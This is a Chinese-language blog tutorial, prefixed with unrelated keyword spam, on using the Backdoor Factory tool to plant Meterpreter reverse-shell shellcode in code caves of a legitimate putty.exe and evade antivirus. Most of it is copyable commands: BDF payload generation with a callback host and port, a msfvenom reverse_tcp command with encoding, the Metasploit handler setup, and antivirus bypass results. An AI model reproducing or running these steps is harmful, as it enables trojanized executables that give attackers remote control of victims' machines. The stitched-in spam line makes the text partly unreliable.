refile自己做的网站,wordpress网站乱码,网络电商平台怎么做,网站建设运营计划书0x01 免杀能力一查表 几点说明#xff1a;
1、上表中标识 √ 说明相应杀毒软件未检测出病毒#xff0c;也就是代表了Bypass。
2、为了更好的对比效果#xff0c;大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全…0x01 免杀能力一查表 几点说明
1、上表中标识 √ 说明相应杀毒软件未检测出病毒也就是代表了Bypass。
2、为了更好的对比效果大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒所以默认情况下360和火绒杀毒情况指的是静态动态查杀。360杀毒版本5.0.0.8160(2019.12.12)火绒版本5.0.33.13(2019.12.12)360安全卫士12.0.0.2001(2019.12.17)。
4、其他杀软的检测指标是在virustotal.com简称VT上在线查杀所以可能只是代表了静态查杀能力数据仅供参考不足以作为免杀的精确判断指标。
5、完全不必要苛求找一种能bypass所有杀软的免杀技术这样的技术肯定是有的只是没被公开一旦公开第二天就能被杀了其实我们只要能bypass目标主机上的杀软就足够了。
0x02 BDF介绍
BackDoor-factory又称后门工厂(BDF)BDF是也是一款老牌的免杀神器其作者曾经在2015年的blackhat大会上介绍过该工具。但是作者已经于2017年停止更新免杀效果就算现在来看也还算不错的。 原理可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来触发payload
0x03 安装BDF
官方地址 https://github.com/secretsquirrel/the-backdoor-factory方法一、如果使用kali或parrot系统中已经安装好了BDF。 如果找不到的话可以使用locate命令查找一下
locate backdoor.py | more 方法二、如果系统里没有安装则需要手动安装
ubuntu里可以直接kali里不能直接安装
apt-get update
apt-get install backdoor-factor方法三、使用docker
BDF作者也考虑到安装容易出问题所以提供了docker环境 docker pull secretsquirrel/the-backdoor-factory
docker run -it secretsquirrel/the-backdoor-factory bash 0x04 直接生成免杀后门
backdoor-factory是把shellcode插入到一个正常的exe文件的代码缝隙中类似于捆绑但不是捆绑所以需要提前准备一个被捆绑的宿主exe文件我这是还是用之前的putty.exe为例。 执行python backdoor.py
4.1、首先检查宿主exe是否被支持
在捆绑之前BDF需要检查一下宿主exe能否被支持插入shellcode。 主要使用下面两个参数 -f指定测试程序-S检查该程序是否支持在使用下面命令前首先将putty.exe复制到docker容器里如何复制看这篇文章 https://editor.csdn.net/md/?articleId104808903 复制之后检查命令: python backdoor.py -f /root/putty.exe -S说明putty.exe可以被支持。
4.2 搜索该文件可用的code Caves代码缝隙
使用命令./backdoor.py -f test.exe -c -l 600
-ccode cave(代码裂缝)-l代码裂缝大小发现1个可用代码缝隙,一般shellcode大小300字节所以选择一个适当的缝隙就可以。
4.3 获取该文件的可用payload
./backdoor.py -f /root/putty.exe -s -show如上图所示会有很多的可利用payload。
cave_miner_inline:作为payload模板长度为135仅实现了控制流程跳转不做其他操作可用作自定义开发shellcode的模板reverse_shell_tcp_inline对应的msfuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpmeterpreter_reverse_https_threaded对应的msfuse exploit/multi/handlerset payload windows/meterpreter/reverse_httpsiat_reverse_tcp_inline中的iatiat为Import Address Table(导入地址表)的缩写如果PE文件的IAT不包含API LoadLibraryA和GetProcAddress直接执行payload reverse_shell_tcp_inline会失败iat_reverse_tcp_inline增加了修复IAT的功能避免执行失败iat_reverse_tcp_stager_threaded:增加了修复IAT的功能user_supplied_shellcode_threaded对应的msfuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcp自定义shellcode
4.4 生成payload
推荐使用的命令
./backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.142.134 -P 5555 -J -o payload.exe
-ccode cave(代码裂缝)-l代码裂缝大小-s选择使用 payload 类型-H选择回连服务器地址-P回连服务器端口-J使用多代码裂缝注入选择一个代码段进行插入shellcode最后就可以生产新的后门程序。 我们可以看到payload.exe在backdoored文件夹下将文件先移动到/root/shell文件夹下再复制到宿主机子里 操作之后文件就在我们的机子里了
4.5 免杀测试
运行payload.exe发现360卫士和杀毒可查杀火绒未检测到病毒。
0x05 使用自己定义的shellcode
先用msfvenom生成raw格式的shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST10.211.55.2 LPORT3333 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c将文件复制到docker容器再使用backdoor的user_supplied_shellcode_threaded模块加载自定义的shellcode
./backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c -o payload2.exemsf监听可上线 msf use exploit/multi/handler
msf exploit(handler) set payload windows/meterpreter/reverse_tcp
payload windows/meterpreter/reverse_tcp
msf exploit(handler) set lhost 10.211.55.2
lhost 10.211.55.2
msf exploit(handler) set lport 3333
lport 3333
msf exploit(handler) exploit但是360依然可以查杀
0x06 小结
利用backdoor-factory使用用户可以在不破坏原有可执行文件的功能的前提下在文件的代码裂隙中插入恶意代码Shellcode。当可执行文件被执行后就可以触发恶意代码。Backdoor Factory不仅提供常用的脚本还允许嵌入其他工具生成的Shellcode如Metasploit。
该工具还有很强大的一些其他功能比如加私钥证书、CPT等等虽然目前软件已经不再更新但免杀效果至今依然不错也能管中窥豹看到它的强悍之处。
0x07 参考资料
利用BDF向EXE文件植入后门:https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91EXE%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/
backdoor-factory使用简介https://www.lstazl.com/backdoor-factory%E4%BD%BF%E7%94%A8%E7%AE%80%E4%BB%8B/
backdoor-factory使用https://www.cnblogs.com/-qing-/p/11421709.html